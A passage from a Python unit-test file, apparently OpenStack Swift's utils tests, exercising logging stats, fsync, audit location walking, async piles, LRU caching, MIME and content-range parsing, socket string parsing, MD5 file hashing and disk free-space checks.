self.assertStat('alpha.beta.pfx.another.counter:3|c', self.logger.update_stats, 'another.counter', 3) self.logger.set_statsd_prefix('') self.assertStat('alpha.beta.some.counter:1|c|@0.9912', self.logger.increment, 'some.counter', sample_rate=0.9912) self.assertStat('alpha.beta.some.counter:-1|c|@0.9912', self.logger.decrement, 'some.counter', 0.9912) self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912', self.logger.timing, 'some.operation', 4.9 * 1000, sample_rate=0.9912) self.assertStatMatches( r'alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912', self.logger.timing_since, 'another.op', time.time(), sample_rate=0.9912) self.assertStat('alpha.beta.another.counter:3|c|@0.9912', self.logger.update_stats, 'another.counter', 3, sample_rate=0.9912) @reset_logger_state def test_thread_locals(self): logger = utils.get_logger(None) # test the setter logger.thread_locals = ('id', 'ip') self.assertEqual(logger.thread_locals, ('id', 'ip')) # reset logger.thread_locals = (None, None) self.assertEqual(logger.thread_locals, (None, None)) logger.txn_id = '1234' logger.client_ip = '1.2.3.4' self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4')) logger.txn_id = '5678' logger.client_ip = '5.6.7.8' self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8')) def test_no_fdatasync(self): called = [] class NoFdatasync(object): pass def fsync(fd): called.append(fd) with patch('swift.common.utils.os', NoFdatasync()): with patch('swift.common.utils.fsync', fsync): utils.fdatasync(12345) self.assertEqual(called, [12345]) def test_yes_fdatasync(self): called = [] class YesFdatasync(object): def fdatasync(self, fd): called.append(fd) with patch('swift.common.utils.os', YesFdatasync()): utils.fdatasync(12345) self.assertEqual(called, [12345]) def test_fsync_bad_fullsync(self): class FCNTL(object): F_FULLSYNC = 123 def fcntl(self, fd, op): raise IOError(18) with patch('swift.common.utils.fcntl', FCNTL()): self.assertRaises(OSError, lambda: utils.fsync(12345)) def test_fsync_f_fullsync(self): called = [] class FCNTL(object): F_FULLSYNC = 123 def fcntl(self, fd, op): called[:] = [fd, op] return 0 with patch('swift.common.utils.fcntl', FCNTL()): utils.fsync(12345) self.assertEqual(called, [12345, 123]) def test_fsync_no_fullsync(self): called = [] class FCNTL(object): pass def fsync(fd): called.append(fd) with patch('swift.common.utils.fcntl', FCNTL()): with patch('os.fsync', fsync): utils.fsync(12345) self.assertEqual(called, [12345]) class TestAuditLocationGenerator(unittest.TestCase): def test_drive_tree_access(self): orig_listdir = utils.listdir def _mock_utils_listdir(path): if 'bad_part' in path: raise OSError(errno.EACCES) elif 'bad_suffix' in path: raise OSError(errno.EACCES) elif 'bad_hash' in path: raise OSError(errno.EACCES) else: return orig_listdir(path) # Check Raise on Bad partition tmpdir = mkdtemp() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) obj_path = os.path.join(data, "bad_part") with open(obj_path, "w"): pass part1 = os.path.join(data, "partition1") os.makedirs(part1) part2 = os.path.join(data, "partition2") os.makedirs(part2) with patch('swift.common.utils.listdir', _mock_utils_listdir): audit = lambda: list(utils.audit_location_generator( tmpdir, "data", mount_check=False)) self.assertRaises(OSError, audit) rmtree(tmpdir) # Check Raise on Bad Suffix tmpdir = mkdtemp() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) part1 = os.path.join(data, "partition1") os.makedirs(part1) part2 = os.path.join(data, "partition2") os.makedirs(part2) obj_path = os.path.join(part1, "bad_suffix") with open(obj_path, 'w'): pass suffix = os.path.join(part2, "suffix") os.makedirs(suffix) with patch('swift.common.utils.listdir', _mock_utils_listdir): audit = lambda: list(utils.audit_location_generator( tmpdir, "data", mount_check=False)) self.assertRaises(OSError, audit) rmtree(tmpdir) # Check Raise on Bad Hash tmpdir = mkdtemp() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) part1 = os.path.join(data, "partition1") os.makedirs(part1) suffix = os.path.join(part1, "suffix") os.makedirs(suffix) hash1 = os.path.join(suffix, "hash1") os.makedirs(hash1) obj_path = os.path.join(suffix, "bad_hash") with open(obj_path, 'w'): pass with patch('swift.common.utils.listdir', _mock_utils_listdir): audit = lambda: list(utils.audit_location_generator( tmpdir, "data", mount_check=False)) self.assertRaises(OSError, audit) rmtree(tmpdir) def test_non_dir_drive(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) # Create a file, that represents a non-dir drive open(os.path.join(tmpdir, 'asdf'), 'w') locations = utils.audit_location_generator( tmpdir, "data", mount_check=False, logger=logger ) self.assertEqual(list(locations), []) self.assertEqual(1, len(logger.get_lines_for_level('warning'))) # Test without the logger locations = utils.audit_location_generator( tmpdir, "data", mount_check=False ) self.assertEqual(list(locations), []) def test_mount_check_drive(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) # Create a file, that represents a non-dir drive open(os.path.join(tmpdir, 'asdf'), 'w') locations = utils.audit_location_generator( tmpdir, "data", mount_check=True, logger=logger ) self.assertEqual(list(locations), []) self.assertEqual(2, len(logger.get_lines_for_level('warning'))) # Test without the logger locations = utils.audit_location_generator( tmpdir, "data", mount_check=True ) self.assertEqual(list(locations), []) def test_non_dir_contents(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) with open(os.path.join(data, "partition1"), "w"): pass partition = os.path.join(data, "partition2") os.makedirs(partition) with open(os.path.join(partition, "suffix1"), "w"): pass suffix = os.path.join(partition, "suffix2") os.makedirs(suffix) with open(os.path.join(suffix, "hash1"), "w"): pass locations = utils.audit_location_generator( tmpdir, "data", mount_check=False, logger=logger ) self.assertEqual(list(locations), []) def test_find_objects(self): with temptree([]) as tmpdir: expected_objs = list() logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) # Create a file, that represents a non-dir drive open(os.path.join(tmpdir, 'asdf'), 'w') partition = os.path.join(data, "partition1") os.makedirs(partition) suffix = os.path.join(partition, "suffix") os.makedirs(suffix) hash_path = os.path.join(suffix, "hash") os.makedirs(hash_path) obj_path = os.path.join(hash_path, "obj1.db") with open(obj_path, "w"): pass expected_objs.append((obj_path, 'drive', 'partition1')) partition = os.path.join(data, "partition2") os.makedirs(partition) suffix = os.path.join(partition, "suffix2") os.makedirs(suffix) hash_path = os.path.join(suffix, "hash2") os.makedirs(hash_path) obj_path = os.path.join(hash_path, "obj2.db") with open(obj_path, "w"): pass expected_objs.append((obj_path, 'drive', 'partition2')) locations = utils.audit_location_generator( tmpdir, "data", mount_check=False, logger=logger ) got_objs = list(locations) self.assertEqual(len(got_objs), len(expected_objs)) self.assertEqual(sorted(got_objs), sorted(expected_objs)) self.assertEqual(1, len(logger.get_lines_for_level('warning'))) def test_ignore_metadata(self): with temptree([]) as tmpdir: logger = FakeLogger() data = os.path.join(tmpdir, "drive", "data") os.makedirs(data) partition = os.path.join(data, "partition2") os.makedirs(partition) suffix = os.path.join(partition, "suffix2") os.makedirs(suffix) hash_path = os.path.join(suffix, "hash2") os.makedirs(hash_path) obj_path = os.path.join(hash_path, "obj1.dat") with open(obj_path, "w"): pass meta_path = os.path.join(hash_path, "obj1.meta") with open(meta_path, "w"): pass locations = utils.audit_location_generator( tmpdir, "data", ".dat", mount_check=False, logger=logger ) self.assertEqual(list(locations), [(obj_path, "drive", "partition2")]) class TestGreenAsyncPile(unittest.TestCase): def setUp(self): self.timeout = Timeout(5.0) def tearDown(self): self.timeout.cancel() def test_runs_everything(self): def run_test(): tests_ran[0] += 1 return tests_ran[0] tests_ran = [0] pile = utils.GreenAsyncPile(3) for x in range(3): pile.spawn(run_test) self.assertEqual(sorted(x for x in pile), [1, 2, 3]) def test_is_asynchronous(self): def run_test(index): events[index].wait() return index pile = utils.GreenAsyncPile(3) for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)): events = [eventlet.event.Event(), eventlet.event.Event(), eventlet.event.Event()] for x in range(3): pile.spawn(run_test, x) for x in order: events[x].send() self.assertEqual(next(pile), x) def test_next_when_empty(self): def run_test(): pass pile = utils.GreenAsyncPile(3) pile.spawn(run_test) self.assertIsNone(next(pile)) self.assertRaises(StopIteration, lambda: next(pile)) def test_waitall_timeout_timesout(self): def run_test(sleep_duration): eventlet.sleep(sleep_duration) completed[0] += 1 return sleep_duration completed = [0] pile = utils.GreenAsyncPile(3) pile.spawn(run_test, 0.1) pile.spawn(run_test, 1.0) self.assertEqual(pile.waitall(0.5), [0.1]) self.assertEqual(completed[0], 1) def test_waitall_timeout_completes(self): def run_test(sleep_duration): eventlet.sleep(sleep_duration) completed[0] += 1 return sleep_duration completed = [0] pile = utils.GreenAsyncPile(3) pile.spawn(run_test, 0.1) pile.spawn(run_test, 0.1) self.assertEqual(pile.waitall(0.5), [0.1, 0.1]) self.assertEqual(completed[0], 2) def test_waitfirst_only_returns_first(self): def run_test(name): eventlet.sleep(0) completed.append(name) return name completed = [] pile = utils.GreenAsyncPile(3) pile.spawn(run_test, 'first') pile.spawn(run_test, 'second') pile.spawn(run_test, 'third') self.assertEqual(pile.waitfirst(0.5), completed[0]) # 3 still completed, but only the first was returned. self.assertEqual(3, len(completed)) def test_wait_with_firstn(self): def run_test(name): eventlet.sleep(0) completed.append(name) return name for first_n in [None] + list(range(6)): completed = [] pile = utils.GreenAsyncPile(10) for i in range(10): pile.spawn(run_test, i) actual = pile._wait(1, first_n) expected_n = first_n if first_n else 10 self.assertEqual(completed[:expected_n], actual) self.assertEqual(10, len(completed)) def test_pending(self): pile = utils.GreenAsyncPile(3) self.assertEqual(0, pile._pending) for repeats in range(2): # repeat to verify that pending will go again up after going down for i in range(4): pile.spawn(lambda: i) self.assertEqual(4, pile._pending) for i in range(3, -1, -1): next(pile) self.assertEqual(i, pile._pending) # sanity check - the pile is empty self.assertRaises(StopIteration, pile.next) # pending remains 0 self.assertEqual(0, pile._pending) def _exploder(self, arg): if isinstance(arg, Exception): raise arg else: return arg def test_blocking_last_next_explodes(self): pile = utils.GreenAsyncPile(2) pile.spawn(self._exploder, 1) pile.spawn(self._exploder, 2) pile.spawn(self._exploder, Exception('kaboom')) self.assertEqual(1, next(pile)) self.assertEqual(2, next(pile)) with self.assertRaises(StopIteration): next(pile) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) def test_no_blocking_last_next_explodes(self): pile = utils.GreenAsyncPile(10) pile.spawn(self._exploder, 1) self.assertEqual(1, next(pile)) pile.spawn(self._exploder, 2) self.assertEqual(2, next(pile)) pile.spawn(self._exploder, Exception('kaboom')) with self.assertRaises(StopIteration): next(pile) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) def test_exceptions_in_streaming_pile(self): with utils.StreamingPile(2) as pile: results = list(pile.asyncstarmap(self._exploder, [ (1,), (Exception('kaboom'),), (3,), ])) self.assertEqual(results, [1, 3]) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) def test_exceptions_at_end_of_streaming_pile(self): with utils.StreamingPile(2) as pile: results = list(pile.asyncstarmap(self._exploder, [ (1,), (2,), (Exception('kaboom'),), ])) self.assertEqual(results, [1, 2]) self.assertEqual(pile.inflight, 0) self.assertEqual(pile._pending, 0) class TestLRUCache(unittest.TestCase): def test_maxsize(self): @utils.LRUCache(maxsize=10) def f(*args): return math.sqrt(*args) _orig_math_sqrt = math.sqrt # setup cache [0-10) for i in range(10): self.assertEqual(math.sqrt(i), f(i)) self.assertEqual(f.size(), 10) # validate cache [0-10) with patch('math.sqrt'): for i in range(10): self.assertEqual(_orig_math_sqrt(i), f(i)) self.assertEqual(f.size(), 10) # update cache [10-20) for i in range(10, 20): self.assertEqual(math.sqrt(i), f(i)) # cache size is fixed self.assertEqual(f.size(), 10) # validate cache [10-20) with patch('math.sqrt'): for i in range(10, 20): self.assertEqual(_orig_math_sqrt(i), f(i)) # validate un-cached [0-10) with patch('math.sqrt', new=None): for i in range(10): self.assertRaises(TypeError, f, i) # cache unchanged self.assertEqual(f.size(), 10) with patch('math.sqrt'): for i in range(10, 20): self.assertEqual(_orig_math_sqrt(i), f(i)) self.assertEqual(f.size(), 10) def test_maxtime(self): @utils.LRUCache(maxtime=30) def f(*args): return math.sqrt(*args) self.assertEqual(30, f.maxtime) _orig_math_sqrt = math.sqrt now = time.time() the_future = now + 31 # setup cache [0-10) with patch('time.time', lambda: now): for i in range(10): self.assertEqual(math.sqrt(i), f(i)) self.assertEqual(f.size(), 10) # validate cache [0-10) with patch('math.sqrt'): for i in range(10): self.assertEqual(_orig_math_sqrt(i), f(i)) self.assertEqual(f.size(), 10) # validate expired [0-10) with patch('math.sqrt', new=None): with patch('time.time', lambda: the_future): for i in range(10): self.assertRaises(TypeError, f, i) # validate repopulates [0-10) with patch('time.time', lambda: the_future): for i in range(10): self.assertEqual(math.sqrt(i), f(i)) # reuses cache space self.assertEqual(f.size(), 10) def test_set_maxtime(self): @utils.LRUCache(maxtime=30) def f(*args): return math.sqrt(*args) self.assertEqual(30, f.maxtime) self.assertEqual(2, f(4)) self.assertEqual(1, f.size()) # expire everything f.maxtime = -1 # validate un-cached [0-10) with patch('math.sqrt', new=None): self.assertRaises(TypeError, f, 4) def test_set_maxsize(self): @utils.LRUCache(maxsize=10) def f(*args): return math.sqrt(*args) for i in range(12): f(i) self.assertEqual(f.size(), 10) f.maxsize = 4 for i in range(12): f(i) self.assertEqual(f.size(), 4) class TestSpliterator(unittest.TestCase): def test_string(self): input_chunks = ["coun", "ter-", "b", "ra", "nch-mater", "nit", "y-fungusy", "-nummular"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(8)), "counter-") self.assertEqual(''.join(si.take(7)), "branch-") self.assertEqual(''.join(si.take(10)), "maternity-") self.assertEqual(''.join(si.take(8)), "fungusy-") self.assertEqual(''.join(si.take(8)), "nummular") def test_big_input_string(self): input_chunks = ["iridium"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(2)), "ir") self.assertEqual(''.join(si.take(1)), "i") self.assertEqual(''.join(si.take(2)), "di") self.assertEqual(''.join(si.take(1)), "u") self.assertEqual(''.join(si.take(1)), "m") def test_chunk_boundaries(self): input_chunks = ["soylent", "green", "is", "people"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(7)), "soylent") self.assertEqual(''.join(si.take(5)), "green") self.assertEqual(''.join(si.take(2)), "is") self.assertEqual(''.join(si.take(6)), "people") def test_no_empty_strings(self): input_chunks = ["soylent", "green", "is", "people"] si = utils.Spliterator(input_chunks) outputs = (list(si.take(7)) # starts and ends on chunk boundary + list(si.take(2)) # spans two chunks + list(si.take(3)) # begins but does not end chunk + list(si.take(2)) # ends but does not begin chunk + list(si.take(6))) # whole chunk + EOF self.assertNotIn('', outputs) def test_running_out(self): input_chunks = ["not much"] si = utils.Spliterator(input_chunks) self.assertEqual(''.join(si.take(4)), "not ") self.assertEqual(''.join(si.take(99)), "much") # short self.assertEqual(''.join(si.take(4)), "") self.assertEqual(''.join(si.take(4)), "") def test_overlap(self): input_chunks = ["one fish", "two fish", "red fish", "blue fish"] si = utils.Spliterator(input_chunks) t1 = si.take(20) # longer than first chunk self.assertLess(len(next(t1)), 20) # it's not exhausted t2 = si.take(20) self.assertRaises(ValueError, next, t2) def test_closing(self): input_chunks = ["abcd", "efg", "hij"] si = utils.Spliterator(input_chunks) it = si.take(3) # shorter than first chunk self.assertEqual(next(it), 'abc') it.close() self.assertEqual(list(si.take(20)), ['d', 'efg', 'hij']) si = utils.Spliterator(input_chunks) self.assertEqual(list(si.take(1)), ['a']) it = si.take(1) # still shorter than first chunk self.assertEqual(next(it), 'b') it.close() self.assertEqual(list(si.take(20)), ['cd', 'efg', 'hij']) si = utils.Spliterator(input_chunks) it = si.take(6) # longer than first chunk, shorter than first + second self.assertEqual(next(it), 'abcd') self.assertEqual(next(it), 'ef') it.close() self.assertEqual(list(si.take(20)), ['g', 'hij']) si = utils.Spliterator(input_chunks) self.assertEqual(list(si.take(2)), ['ab']) it = si.take(3) # longer than rest of chunk self.assertEqual(next(it), 'cd') it.close() self.assertEqual(list(si.take(20)), ['efg', 'hij']) class TestParseContentRange(unittest.TestCase): def test_good(self): start, end, total = utils.parse_content_range("bytes 100-200/300") self.assertEqual(start, 100) self.assertEqual(end, 200) self.assertEqual(total, 300) def test_bad(self): self.assertRaises(ValueError, utils.parse_content_range, "100-300/500") self.assertRaises(ValueError, utils.parse_content_range, "bytes 100-200/aardvark") self.assertRaises(ValueError, utils.parse_content_range, "bytes bulbous-bouffant/4994801") class TestParseContentDisposition(unittest.TestCase): def test_basic_content_type(self): name, attrs = utils.parse_content_disposition('text/plain') self.assertEqual(name, 'text/plain') self.assertEqual(attrs, {}) def test_content_type_with_charset(self): name, attrs = utils.parse_content_disposition( 'text/plain; charset=UTF8') self.assertEqual(name, 'text/plain') self.assertEqual(attrs, {'charset': 'UTF8'}) def test_content_disposition(self): name, attrs = utils.parse_content_disposition( 'form-data; name="somefile"; filename="test.html"') self.assertEqual(name, 'form-data') self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'}) def test_content_disposition_without_white_space(self): name, attrs = utils.parse_content_disposition( 'form-data;name="somefile";filename="test.html"') self.assertEqual(name, 'form-data') self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'}) class TestIterMultipartMimeDocuments(unittest.TestCase): def test_bad_start(self): it = utils.iter_multipart_mime_documents(BytesIO(b'blah'), b'unique') exc = None try: next(it) except MimeInvalid as err: exc = err self.assertTrue('invalid starting boundary' in str(exc)) self.assertTrue('--unique' in str(exc)) def test_empty(self): it = utils.iter_multipart_mime_documents(BytesIO(b'--unique'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'') self.assertRaises(StopIteration, next, it) def test_basic(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'abcdefg') self.assertRaises(StopIteration, next, it) def test_basic2(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'abcdefg') fp = next(it) self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_tiny_reads(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(2), b'ab') self.assertEqual(fp.read(2), b'cd') self.assertEqual(fp.read(2), b'ef') self.assertEqual(fp.read(2), b'g') self.assertEqual(fp.read(2), b'') fp = next(it) self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_big_reads(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(65536), b'abcdefg') self.assertEqual(fp.read(), b'') fp = next(it) self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_leading_crlfs(self): it = utils.iter_multipart_mime_documents( BytesIO(b'\r\n\r\n\r\n--unique\r\nabcdefg\r\n' b'--unique\r\nhijkl\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.read(65536), b'abcdefg') self.assertEqual(fp.read(), b'') fp = next(it) self.assertEqual(fp.read(), b'hijkl') self.assertRaises(StopIteration, next, it) def test_broken_mid_stream(self): # We go ahead and accept whatever is sent instead of rejecting the # whole request, in case the partial form is still useful. it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nabc'), b'unique') fp = next(it) self.assertEqual(fp.read(), b'abc') self.assertRaises(StopIteration, next, it) def test_readline(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n' b'jkl\r\n\r\n--unique--'), b'unique') fp = next(it) self.assertEqual(fp.readline(), b'ab\r\n') self.assertEqual(fp.readline(), b'cd\ref\ng') self.assertEqual(fp.readline(), b'') fp = next(it) self.assertEqual(fp.readline(), b'hi\r\n') self.assertEqual(fp.readline(), b'\r\n') self.assertEqual(fp.readline(), b'jkl\r\n') self.assertRaises(StopIteration, next, it) def test_readline_with_tiny_chunks(self): it = utils.iter_multipart_mime_documents( BytesIO(b'--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n' b'\r\njkl\r\n\r\n--unique--'), b'unique', read_chunk_size=2) fp = next(it) self.assertEqual(fp.readline(), b'ab\r\n') self.assertEqual(fp.readline(), b'cd\ref\ng') self.assertEqual(fp.readline(), b'') fp = next(it) self.assertEqual(fp.readline(), b'hi\r\n') self.assertEqual(fp.readline(), b'\r\n') self.assertEqual(fp.readline(), b'jkl\r\n') self.assertRaises(StopIteration, next, it) class TestParseMimeHeaders(unittest.TestCase): def test_parse_mime_headers(self): doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size" Foo: Bar NOT-title-cAsED: quux Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?= Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?= Latin-1: Resincronizaci\xf3n realizada con \xe9xito Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80 This is the body """) headers = utils.parse_mime_headers(doc_file) utf8 = u'\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440' if six.PY2: utf8 = utf8.encode('utf-8') expected_headers = { 'Content-Disposition': 'form-data; name="file_size"', 'Foo': "Bar", 'Not-Title-Cased': "quux", # Encoded-word or non-ASCII values are treated just like any other # bytestring (at least for now) 'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=", 'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=", 'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito", 'Utf-8': utf8, } self.assertEqual(expected_headers, headers) self.assertEqual(b"This is the body\n", doc_file.read()) class FakeResponse(object): def __init__(self, status, headers, body): self.status = status self.headers = HeaderKeyDict(headers) self.body = BytesIO(body) def getheader(self, header_name): return str(self.headers.get(header_name, '')) def getheaders(self): return self.headers.items() def read(self, length=None): return self.body.read(length) def readline(self, length=None): return self.body.readline(length) class TestDocumentItersToHTTPResponseBody(unittest.TestCase): def test_no_parts(self): body = utils.document_iters_to_http_response_body( iter([]), 'dontcare', multipart=False, logger=FakeLogger()) self.assertEqual(body, '') def test_single_part(self): body = b"time flies like an arrow; fruit flies like a banana" doc_iters = [{'part_iter': iter(BytesIO(body).read, b'')}] resp_body = b''.join( utils.document_iters_to_http_response_body( iter(doc_iters), b'dontcare', multipart=False, logger=FakeLogger())) self.assertEqual(resp_body, body) def test_multiple_parts(self): part1 = b"two peanuts were walking down a railroad track" part2 = b"and one was a salted. ... peanut." doc_iters = [{ 'start_byte': 88, 'end_byte': 133, 'content_type': 'application/peanut', 'entity_length': 1024, 'part_iter': iter(BytesIO(part1).read, b''), }, { 'start_byte': 500, 'end_byte': 532, 'content_type': 'application/salted', 'entity_length': 1024, 'part_iter': iter(BytesIO(part2).read, b''), }] resp_body = b''.join( utils.document_iters_to_http_response_body( iter(doc_iters), b'boundaryboundary', multipart=True, logger=FakeLogger())) self.assertEqual(resp_body, ( b"--boundaryboundary\r\n" + # This is a little too strict; we don't actually care that the # headers are in this order, but the test is much more legible # this way. b"Content-Type: application/peanut\r\n" + b"Content-Range: bytes 88-133/1024\r\n" + b"\r\n" + part1 + b"\r\n" + b"--boundaryboundary\r\n" b"Content-Type: application/salted\r\n" + b"Content-Range: bytes 500-532/1024\r\n" + b"\r\n" + part2 + b"\r\n" + b"--boundaryboundary--")) def test_closed_part_iterator(self): print('test') useful_iter_mock = mock.MagicMock() useful_iter_mock.__iter__.return_value = [''] body_iter = utils.document_iters_to_http_response_body( iter([{'part_iter': useful_iter_mock}]), 'dontcare', multipart=False, logger=FakeLogger()) body = '' for s in body_iter: body += s self.assertEqual(body, '') useful_iter_mock.close.assert_called_once_with() # Calling "close" on the mock will now raise an AttributeError del useful_iter_mock.close body_iter = utils.document_iters_to_http_response_body( iter([{'part_iter': useful_iter_mock}]), 'dontcare', multipart=False, logger=FakeLogger()) body = '' for s in body_iter: body += s class TestPairs(unittest.TestCase): def test_pairs(self): items = [10, 20, 30, 40, 50, 60] got_pairs = set(utils.pairs(items)) self.assertEqual(got_pairs, set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60), (20, 30), (20, 40), (20, 50), (20, 60), (30, 40), (30, 50), (30, 60), (40, 50), (40, 60), (50, 60)])) class TestSocketStringParser(unittest.TestCase): def test_socket_string_parser(self): default = 1337 addrs = [('1.2.3.4', '1.2.3.4', default), ('1.2.3.4:5000', '1.2.3.4', 5000), ('[dead:beef::1]', 'dead:beef::1', default), ('[dead:beef::1]:5000', 'dead:beef::1', 5000), ('example.com', 'example.com', default), ('example.com:5000', 'example.com', 5000), ('foo.1-2-3.bar.com:5000', 'foo.1-2-3.bar.com', 5000), ('1.2.3.4:10:20', None, None), ('dead:beef::1:5000', None, None)] for addr, expected_host, expected_port in addrs: if expected_host: host, port = utils.parse_socket_string(addr, default) self.assertEqual(expected_host, host) self.assertEqual(expected_port, int(port)) else: with self.assertRaises(ValueError): utils.parse_socket_string(addr, default) class TestHashForFileFunction(unittest.TestCase): def setUp(self): self.tempfilename = tempfile.mktemp() def tearDown(self): try: os.unlink(self.tempfilename) except OSError: pass def test_hash_for_file_smallish(self): stub_data = b'some data' with open(self.tempfilename, 'wb') as fd: fd.write(stub_data) with mock.patch('swift.common.utils.md5') as mock_md5: mock_hasher = mock_md5.return_value rv = utils.md5_hash_for_file(self.tempfilename) self.assertTrue(mock_hasher.hexdigest.called) self.assertEqual(rv, mock_hasher.hexdigest.return_value) self.assertEqual([mock.call(stub_data)], mock_hasher.update.call_args_list) def test_hash_for_file_big(self): num_blocks = 10 block_size = utils.MD5_BLOCK_READ_BYTES truncate = 523 start_char = ord('a') expected_blocks = [chr(i).encode('utf8') * block_size for i in range(start_char, start_char + num_blocks)] full_data = b''.join(expected_blocks) trimmed_data = full_data[:-truncate] # sanity self.assertEqual(len(trimmed_data), block_size * num_blocks - truncate) with open(self.tempfilename, 'wb') as fd: fd.write(trimmed_data) with mock.patch('swift.common.utils.md5') as mock_md5: mock_hasher = mock_md5.return_value rv = utils.md5_hash_for_file(self.tempfilename) self.assertTrue(mock_hasher.hexdigest.called) self.assertEqual(rv, mock_hasher.hexdigest.return_value) self.assertEqual(num_blocks, len(mock_hasher.update.call_args_list)) found_blocks = [] for i, (expected_block, call) in enumerate(zip( expected_blocks, mock_hasher.update.call_args_list)): args, kwargs = call self.assertEqual(kwargs, {}) self.assertEqual(1, len(args)) block = args[0] if i < num_blocks - 1: self.assertEqual(block, expected_block) else: self.assertEqual(block, expected_block[:-truncate]) found_blocks.append(block) self.assertEqual(b''.join(found_blocks), trimmed_data) def test_hash_for_file_empty(self): with open(self.tempfilename, 'wb'): pass with mock.patch('swift.common.utils.md5') as mock_md5: mock_hasher = mock_md5.return_value rv = utils.md5_hash_for_file(self.tempfilename) self.assertTrue(mock_hasher.hexdigest.called) self.assertIs(rv, mock_hasher.hexdigest.return_value) self.assertEqual([], mock_hasher.update.call_args_list) def test_hash_for_file_brittle(self): data_to_expected_hash = { b'': 'd41d8cd98f00b204e9800998ecf8427e', b'some data': '1e50210a0202497fb79bc38b6ade6c34', (b'a' * 4096 * 10)[:-523]: '06a41551609656c85f14f659055dc6d3', } # unlike some other places where the concrete implementation really # matters for backwards compatibility these brittle tests are probably # not needed or justified, if a future maintainer rips them out later # they're probably doing the right thing failures = [] for stub_data, expected_hash in data_to_expected_hash.items(): with open(self.tempfilename, 'wb') as fd: fd.write(stub_data) rv = utils.md5_hash_for_file(self.tempfilename) try: self.assertEqual(expected_hash, rv) except AssertionError: trim_cap = 80 if len(stub_data) > trim_cap: stub_data = '%s...<truncated>' % stub_data[:trim_cap] failures.append('hash for %r was %s instead of expected %s' % ( stub_data, rv, expected_hash)) if failures: self.fail('Some data did not compute expected hash:\n' + '\n'.join(failures)) class TestFsHasFreeSpace(unittest.TestCase): def test_bytes(self): fake_result = posix.statvfs_result([ 4096, # f_bsize 4096, # f_frsize 2854907, # f_blocks 1984802, # f_bfree (free blocks for root) 1728089, # f_bavail (free blocks for non-root) 1280000, # f_files 1266040, # f_ffree, 1266040, # f_favail, 4096, # f_flag 255, # f_namemax ]) with mock.patch('os.statvfs', return_value=fake_result): self.assertTrue(utils.fs_has_free_space("/", 0, False)) self.assertTrue(utils.fs_has_free_space("/", 1, False)) # free space left = f_bavail * f_bsize = 7078252544 self.assertTrue(utils.fs_has_free_space("/", 7078252544, False)) self.assertFalse(utils.fs_has_free_space("/", 7078252545, False)) self.assertFalse(utils.fs_has_free_space("/", 2 ** 64, False)) def test_percent(self): fake_result = posix.statvfs_result([ 4096, # f_bsize 4096, # f_frsize 2854907, # f_blocks 1984802, # f_bfree (free blocks for root) 1728089, # f_bavail (free blocks for non-root) 1280000, # f_files 1266040, # f_ffree, 1266040, # f_favail, 4096, # f_flag 255, # f_namemax ]) with mock.patch('os.statvfs', return_value=fake_result): self.assertTrue(utils.fs_has_free_space("/", 0, True)) self.assertTrue(utils.fs_has_free_space("/", 1, True)) # percentage of free space for the faked statvfs is 60% self.assertTrue(utils.fs_has_free_space("/", 60, True)) self.assertFalse(utils.fs_has_free_space("/", 61, True)) self.assertFalse(utils.fs_has_free_space("/", 100, True)) self.assertFalse(utils.fs_has_free_space("/", 110, True)) class TestSetSwiftDir(unittest.TestCase): def setUp(self): self.swift_dir = tempfile.mkdtemp() self.swift_conf = 